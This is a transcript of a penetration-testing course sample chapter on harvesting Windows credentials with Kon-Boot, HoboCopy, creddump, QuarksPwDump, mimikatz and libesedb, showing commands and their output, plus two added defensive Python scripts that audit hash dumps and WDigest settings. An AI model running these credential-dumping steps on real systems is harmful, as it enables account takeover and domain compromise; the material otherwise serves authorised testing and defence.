WARNING! Sample chapter

Feb 19, 2016

Transcript
Page 1: WARNING! Sample chapter
Page 2: WARNING! Sample chapter

- Materials in this sample chapter are selected advanced penetration material from
https://training.zdresearch.com
- We hope you enjoy it!

Page 3: WARNING! Sample chapter

Obtaining Windows Passwords

- Now that you know about pass the hash and how Windows hashing works, let's look at some attack scenarios.

- Let's assume that we are inside a network that uses a domain controller to manage resources and users.

Page 4: WARNING! Sample chapter

Obtaining Windows Passwords

- As a reminder, let's take a quick look at how Active Directory works again.

Page 5: WARNING! Sample chapter

Obtaining Windows Passwords

- OK, now let's go through the scenarios that we can use to obtain NT and LM hashes for doing pass the hash attacks.

1- Physical attack and password bypass
2- Dumping NT and LM hashes using SAM database
3- Dumping Windows passwords from password history
4- Dumping passwords and hashes from logon sessions
5- Dumping hashed password from Domain Controller

Page 6: WARNING! Sample chapter

Physical attack and password bypass

• In the first scenario we have physical access to the system, so how can we log in to a password-protected system?
• The answer is very easy: Windows does not offer any protection against physical-access attacks.
• You can use any live disk to modify the SAM database in /system32/config.
• You can boot from both USB and CD.
• But there is a problem with this method: the user will notice when you have modified her/his password or added a totally new user.
• So what is the solution now?

Page 7: WARNING! Sample chapter

Physical attack and password bypass

• Using Kon-Boot to win
• You can buy it for $15
• http://www.piotrbania.com/all/kon-boot/
• Kon-Boot applies a temporary patch to the kernel
• So you can log in as any user without the password
• Do your job and restart the system
• The original password will still work
• So you did a fully stealthy attack!

Page 8: WARNING! Sample chapter

Dumping NT and LM hashes using SAM database

• Second scenario is using
• You need a copy of the protected SAM file, which by default is not possible.
• Using hobocopy or Fast RAW file copier makes it possible.

C:\hobo copy\x64>HoboCopy.exe c:\Windows\System32\config c:\config-bkp
44 files (136.92 MB, 1 directories) copied, 0 files skipped

Page 9: WARNING! Sample chapter

Dumping NT and LM hashes using SAM database

• Now you can use creddump in your BT/Kali to extract the hashes.
• You can see the SYSTEM file here; this file is called the system hive, it holds the syskey too, and it is used to offer a more secure password-storage mechanism.

root@bt:/pentest/passwords/creddump# ./pwdump.py /root/SYSTEM /root/SAM
Administrator:500:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::

Page 10: WARNING! Sample chapter

Dumping Windows passwords from password history

• In networks with more than 10 users you may be out of luck if you only look at the SAM file.
• But depending on how the DC is configured, we may be able to use certain situations to find attacks on the host machine.
• One of the main situations here is the password history feature.

Page 11: WARNING! Sample chapter

Dumping Windows passwords from password history

• This policy will not let a user reuse the same password they used in the last X period.
• For example, if your password was 12345, your next password after it expires can't be the same 12345.
• A very cool tool called QuarksPwDump can help you to dump hashes in these situations.

C:\>QuarksPwDump.exe -dhl -hist
Administrator:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
Administrator_hist0:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
Administrator_hist1:500:AEBD4DE384C7EC43AAD3B435B51404EE:7A21990FCD3D759941E45C490F143D5F:::
Administrator_hist2:500:B757BF5C0D87772FAAD3B435B51404EE:7CE21F17C0AEE7FB9CEBA532D0546AD6:::
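The user:RID:LM-hash:NT-hash::: lines that pwdump.py prints from the SAM (page 9) and that QuarksPwDump prints with history (above) are the same lines a defender reviews after an authorised password audit. The Python script below is an added example, not part of the slides or of creddump/QuarksPwDump: it parses that format and reports what the hashes reveal on their own, without cracking anything: an LM hash stored at all (LM hashing is still enabled and the password is at most 14 characters), an LM second half equal to the empty-block constant (the password is 7 characters or fewer, as with every Administrator entry above), an empty password, and one NT hash reused by different accounts. The Administrator lines are the ones on the slide; the Guest and svc_backup lines are constructed to exercise the remaining checks, and the "NO PASSWORD***" LM field in the constructed line is the marker creddump uses when no LM hash is stored.

```python
# Added example (not from the training slides): audit a pwdump-format hash
# dump (user:RID:LM-hash:NT-hash:::) for the weak-hashing indicators a
# defender reports after an authorised password audit.  Nothing is cracked;
# every finding follows from properties of the hash formats themselves.
import re
from collections import defaultdict

# Fixed properties of the hash formats, independent of any particular dump.
EMPTY_LM_HALF = "aad3b435b51404ee"              # LM hash of an empty 7-char half
EMPTY_LM = EMPTY_LM_HALF * 2                    # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

HEX32 = re.compile(r"[0-9a-f]{32}")
HIST_RE = re.compile(r"^(?P<base>.+)_hist(?P<n>\d+)$")  # QuarksPwDump history naming

# The Administrator lines are the QuarksPwDump output shown on the slide;
# Guest and svc_backup are constructed to exercise the remaining checks.
# A "NO PASSWORD*****" LM field is how creddump marks an absent LM hash.
SAMPLE_DUMP = """\
Administrator:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
Administrator_hist0:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
Administrator_hist1:500:AEBD4DE384C7EC43AAD3B435B51404EE:7A21990FCD3D759941E45C490F143D5F:::
Administrator_hist2:500:B757BF5C0D87772FAAD3B435B51404EE:7CE21F17C0AEE7FB9CEBA532D0546AD6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:NO PASSWORD*********************:7CE21F17C0AEE7FB9CEBA532D0546AD6:::
"""


def parse_pwdump(text):
    """Parse pwdump-format lines; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        m = HIST_RE.match(user)
        entries.append({
            "user": user,
            "base": m.group("base") if m else user,    # account the entry belongs to
            "slot": int(m.group("n")) if m else None,  # None = live password
            "rid": rid,
            "lm": lm if HEX32.fullmatch(lm) else None,  # None for "NO PASSWORD***"
            "nt": nt if HEX32.fullmatch(nt) else None,
        })
    return entries


def audit_entry(e):
    """Findings that follow from a single entry's LM/NT hashes."""
    findings = []
    if e["lm"] and e["lm"] != EMPTY_LM:
        findings.append("LM hash stored (LM hashing enabled, password at most 14 chars)")
        if e["lm"][16:] == EMPTY_LM_HALF:
            findings.append("LM second half empty (password 7 chars or shorter)")
    if e["nt"] == EMPTY_NT:
        findings.append("empty password")
    return findings


def audit_dump(text):
    """Return ({entry name: [findings]}, {shared NT hash: [accounts]})."""
    entries = parse_pwdump(text)
    report = {e["user"]: audit_entry(e) for e in entries}
    # Group by NT hash on the base account, so an account's own history
    # (hist0 repeats the live hash) never counts as cross-account reuse.
    by_nt = defaultdict(set)
    for e in entries:
        if e["nt"] and e["nt"] != EMPTY_NT:
            by_nt[e["nt"]].add(e["base"])
    shared = {h: sorted(a) for h, a in by_nt.items() if len(a) > 1}
    for h, accounts in shared.items():
        for e in entries:
            if e["nt"] == h:
                others = [a for a in accounts if a != e["base"]]
                report[e["user"]].append("NT hash shared with " + ", ".join(others))
    return report, shared


if __name__ == "__main__":
    report, shared = audit_dump(SAMPLE_DUMP)
    for name, findings in report.items():
        print(name, findings or "no findings")
```

Because QuarksPwDump repeats the live hash as _hist0, history entries are folded into their base account before the cross-account comparison, so an account is never reported as sharing a hash with its own history; only the constructed svc_backup line, whose NT hash matches Administrator_hist2, produces a sharing finding.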

Page 12: WARNING! Sample chapter

Dumping passwords and hashes from logon sessions

• We are still not done! We have more very cool methods for obtaining Windows passwords.
• Windows keeps every single successful login in memory and calls this a logon session.
• The info in memory includes the username, workgroup and the NT:LM hashed password.
• And this memory storage is not only about GUI logins; it can happen from:
  • RDP login
  • Using the RunAs feature
  • Using every API call that needs a login, like CreateProcessWithLogon
  • Etc.

Page 13: WARNING! Sample chapter

Dumping passwords and hashes from logon sessions

• For extracting logon sessions, as you know, you need a privileged user.
• For this task we will use a French tool called mimikatz
• http://blog.gentilkiwi.com
• This tool extracts passwords by injecting a DLL called sekurlsa.dll into the lsass.exe process.
• You can follow the method on the next slide to dump Windows passwords in clear text!
• Please note that you should type every command after the # sign.

Page 14: WARNING! Sample chapter

Dumping passwords and hashes from logon sessions

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 432
…

mimikatz # @getLogonPasswords full
Authentification Id : 0;470133
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : Sensetive-man
        msv1_0 :
         * Utilisateur : Administrator
         * Domaine : Sensetive-man
         * Hash LM : 44efce164ab921caaad3b435b51404ee
         * Hash NTLM : 32ed87bdb5fdc5e9cba88547376818d4
        wdigest :
         * Utilisateur : Administrator
         * Domaine : Sensetive-man
         * Mot de passe : 123456
        tspkg :
         * Utilisateur : Administrator
         * Domaine : Sensetive-man
         * Mot de passe : 123456
        kerberos :
         * Utilisateur : Administrator
         * Domaine : Sensetive-man
         * Mot de passe : 123456

mimikatz #

Page 15: WARNING! Sample chapter

Dumping passwords and hashes from logon sessions

• OK, so we can get clear-text passwords. Why?
• In Windows after Vista there is a new Security Support Provider (SSP) for RDP, called Tspkg for short. This feature adds single sign-on ("remember me!") to this protocol.
• And in almost all Windows versions we have another feature called WDigest; this is another SSP implementation for authentication and, because of the way it responds to challenges, it keeps a clear-text version of the password in memory.

Page 16: WARNING! Sample chapter

Dumping passwords and hashes from logon sessions

• Using the Kerberos protocol or msv1_0 authentication, which lsass uses for connecting to domains, will force Windows to keep passwords in clear text.
• In the following figure you can see the SSP settings of a Windows 7 machine.
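The slides above explain that WDigest and Tspkg are SSPs loaded into lsass and that WDigest keeps a clear-text copy of the password to answer challenges. On the defender's side, the setting that switches that caching off is the UseLogonCredential DWORD under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest (built in from Windows 8.1 / Server 2012 R2 onward, added to Windows 7/8/2008 R2/2012 by KB2871997), and the SSPs lsass loads are listed in the Security Packages value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, which is what the Windows 7 SSP figure referred to above shows. The Python script below is an added example, not from the course or from any Microsoft tool: it parses the text that reg query prints for those two keys and reports whether a host is still caching clear-text WDigest credentials. Both reg query outputs are constructed samples; the key paths and value names are the real ones.

```python
# Added example (not from the training slides): audit the registry settings
# that decide whether lsass keeps clear-text WDigest passwords, working from
# the text that `reg query` prints.  Key paths and value names are real;
# both sample outputs are constructed.
import re

LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
WDIGEST_KEY = (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control"
               r"\SecurityProviders\WDigest")

# Constructed: what `reg query` prints on a Windows 7 host that loads
# wdigest and tspkg and has never had UseLogonCredential set.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Negotiate    REG_DWORD    0x0
    UTF8HTTP    REG_DWORD    0x1
"""

# Constructed: the same host after KB2871997 with UseLogonCredential = 0.
HARDENED_REG_OUTPUT = SAMPLE_REG_OUTPUT + "    UseLogonCredential    REG_DWORD    0x0\n"


def parse_reg_query(text):
    """Parse `reg query` output into {key_path: {value_name: (type, data)}}.

    Key lines start in column 0; value lines are indented and carry the
    value name, type and data separated by runs of spaces.  REG_DWORD data
    is printed as hex (0x...), REG_MULTI_SZ entries are joined with \\0.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw[0].isspace():
            current = raw.strip()
            keys.setdefault(current, {})
            continue
        parts = re.split(r"\s{2,}", raw.strip(), maxsplit=2)
        if current is None or len(parts) < 2:
            continue
        name, rtype = parts[0], parts[1]
        data = parts[2] if len(parts) == 3 else ""
        if rtype == "REG_DWORD":
            data = int(data, 16)
        elif rtype == "REG_MULTI_SZ":
            data = [s for s in data.split(r"\0") if s]
        keys[current][name] = (rtype, data)
    return keys


def audit_wdigest(reg_text, legacy_os):
    """Return a list of findings for the host whose `reg query` text is given.

    legacy_os=True means Windows 7/8/2008 R2/2012: there clear-text caching
    stays on unless UseLogonCredential is explicitly 0 (possible once
    KB2871997 is installed).  On 8.1/2012 R2 and later the default is off
    and only an explicit value of 1 turns it back on.
    """
    keys = parse_reg_query(reg_text)
    findings = []
    packages = keys.get(LSA_KEY, {}).get("Security Packages", ("", []))[1]
    loaded = [p.lower() for p in packages] if isinstance(packages, list) else []
    for ssp in ("wdigest", "tspkg"):
        if ssp in loaded:
            findings.append(f"{ssp} SSP is loaded by lsass")
    ulc = keys.get(WDIGEST_KEY, {}).get("UseLogonCredential")
    if ulc is not None and ulc[1] == 1:
        findings.append("UseLogonCredential=1: WDigest caches clear-text passwords")
    elif ulc is None and legacy_os:
        findings.append("UseLogonCredential missing on a pre-8.1 host: "
                        "clear-text caching is on; install KB2871997 and set it to 0")
    return findings


if __name__ == "__main__":
    for finding in audit_wdigest(SAMPLE_REG_OUTPUT, legacy_os=True):
        print("finding:", finding)
```

UseLogonCredential governs WDigest only; the loaded tspkg package is reported as an informational finding so that whoever reviews the host can decide whether the RDP single sign-on it provides is actually needed there.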

Page 17: WARNING! Sample chapter

Dumping hashed password from Domain Controller

• OK, we are at the last method in our Windows-password-dumping journey.
• By now you should easily understand that you can find your DC manager's password in your host's memory.
• So you will connect to your DC using RDP and look at the SAM file, and all you will get is the users of the DC machine, not all the domain users.
• To get all users' passwords you should head to \windows\NTDS.

Page 18: WARNING! Sample chapter

Dumping hashed password from Domain Controller

• For accomplishing this task we need two tools: one is called libesedb and the other is our previously used creddump.
• http://sourceforge.net/projects/libesedb/
• http://code.google.com/p/creddump/
• So you have to compile libesedb and put the hash table you extracted from NTDS into the NTDS.export directory.

# cd libesedb
# chmod +x configure
# ./configure && make
-- Now extract the hash table from ntds.dit and put it in the NTDS.export directory in the same program directory
# cd esedbtools
# ./esedbdumphash ../../ntds.dit

Now you can use creddump to dump the passwords; remember you need the SYSTEM file.

root@bt:~/creddump# python dsdump.py ../SYSTEM ../NTDS.export/datatable
Administrator:500:NO PASSWORD*********************:031F8E5A76932FC5CC7431680ADAE4EC:::

Page 19: WARNING! Sample chapter

End of sample

• Using these simple tools and tricks you can successfully and completely compromise a lot of Windows networks during your penetration tests. I hope you enjoyed the sample, and see you in the full course!!!

Page 20: WARNING! Sample chapter